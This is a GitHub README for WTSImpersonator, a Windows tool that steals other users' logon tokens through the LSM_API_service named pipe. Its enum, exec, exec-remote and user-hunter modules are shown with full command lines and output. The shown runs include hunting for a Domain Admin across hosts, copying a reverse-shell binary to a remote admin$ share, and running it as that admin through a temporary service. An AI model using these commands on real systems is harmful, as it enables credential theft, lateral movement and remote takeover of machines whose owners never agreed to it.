Skip to content

WTSImpersonator utilizes WTSQueryUserToken to steal user tokens by abusing the RPC Named Pipe "\\pipe\LSM_API_service"


Notifications You must be signed in to change notification settings


Repository files navigation


WTSImpersonator utilizes WTSQueryUserToken to steal other users tokens (Local/Remote) without using NtOpenProcess or touching Lsass.exe by abusing RPC Named Pipe "\pipe\LSM_API_service" (Admin Privileges Required)

wtsLOGO (2) (2)


enum Module:

Enumerate Local Users on the machine the tool is running from

.\WTSImpersonator.exe -m enum

Enumerate a machine remotely given an IP or an Hostname.

.\WTSImpersonator.exe -m enum -s  

exec / exec-remote Module:

Both "exec" and "exec-remote" requires being in a "Service" context.
The local "exec" module does not need anything but the WTSImpersonator.exe and the binary you want to execute (-c flag), this could be
a normal "C:\Windows\System32\cmd.exe" and you will open a CMD as the user you desire, an example would be

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe  

you could use PsExec64.exe in order to obtain a service context

.\PsExec64.exe -accepteula -s cmd.exe

For exec-remote things are a bit different, I created a service that can be installed remotely just like PsExec.exe
the service will receive a SessionId and a binary to run as an argument and it will be installed and executed remotely given the right permissions
an example run would look as follows:

PS C:\Users\Jon\Desktop> .\WTSImpersonator.exe -m enum -s

 __          _________ _____ _____                                                 _
 \ \        / /__   __/ ____|_   _|                                               | |
  \ \  /\  / /   | | | (___   | |  _ __ ___  _ __   ___ _ __ ___  ___  _ __   __ _| |_ ___  _ __
   \ \/  \/ /    | |  \___ \  | | | '_ ` _ \| '_ \ / _ \ '__/ __|/ _ \| '_ \ / _` | __/ _ \| '__|
    \  /\  /     | |  ____) |_| |_| | | | | | |_) |  __/ |  \__ \ (_) | | | | (_| | || (_) | |
     \/  \/      |_| |_____/|_____|_| |_| |_| .__/ \___|_|  |___/\___/|_| |_|\__,_|\__\___/|_|
                                            | |
         By: Omri Baso
WTSEnumerateSessions count: 1
[2] SessionId: 2 State: WTSDisconnected (4) WinstationName: ''
        WTSUserName:  Administrator
        WTSDomainName: LABS
        WTSConnectState: 4 (WTSDisconnected)

as can be seen above the Sessionid of the Administrator account is 2 so we use it next in the id variable when executing code remotely

PS C:\Users\Jon\Desktop> .\WTSImpersonator.exe -m exec-remote -s -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

user-hunter Module:

The user hunter module will give you the ability to enumerate multiple machines and if a given user is found, it will execute code on this user behalf.
this is useful when hunting for "Domain Admins" while having local administrator rights on a few machines.

PS C:\Users\Jon\Desktop> .\WTSImpersonator.exe -m user-hunter -uh LABS/Administrator -ipl .\test.txt -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe

 __          _________ _____ _____                                                 _
 \ \        / /__   __/ ____|_   _|                                               | |
  \ \  /\  / /   | | | (___   | |  _ __ ___  _ __   ___ _ __ ___  ___  _ __   __ _| |_ ___  _ __
   \ \/  \/ /    | |  \___ \  | | | '_ ` _ \| '_ \ / _ \ '__/ __|/ _ \| '_ \ / _` | __/ _ \| '__|
    \  /\  /     | |  ____) |_| |_| | | | | | |_) |  __/ |  \__ \ (_) | | | | (_| | || (_) | |
     \/  \/      |_| |_____/|_____|_| |_| |_| .__/ \___|_|  |___/\___/|_| |_|\__,_|\__\___/|_|
                                            | |
         By: Omri Baso

[+] Hunting for: LABS/Administrator On list: .\test.txt
[-] Trying:
[+] Opned WTS Handle:
[-] Trying:
[+] Opned WTS Handle:

[+] Found User: LABS/Administrator On Server:
[+] Getting Code Execution as: LABS/Administrator
[+] Trying to execute remotly
[+] Transfering file remotely from: .\WTSService.exe To: \\\admin$\voli.exe
[+] Transfering file remotely from: .\SimpleReverseShellExample.exe To: \\\admin$\DrkSIM.exe
[+] Successfully transfered file!
[+] Successfully transfered file!
[+] Sucessfully Transferred Both Files
[+] Will Create Service voli
[+] Create Service Success : "C:\Windows\voli.exe" 2 C:\Windows\DrkSIM.exe
[+] OpenService Success!
[+] Started Sevice Sucessfully!

[+] Deleted Service


Research / Coding: Omri Baso

Graphics Logo: Kim Dvash


WTSImpersonator utilizes WTSQueryUserToken to steal user tokens by abusing the RPC Named Pipe "\\pipe\LSM_API_service"







No packages published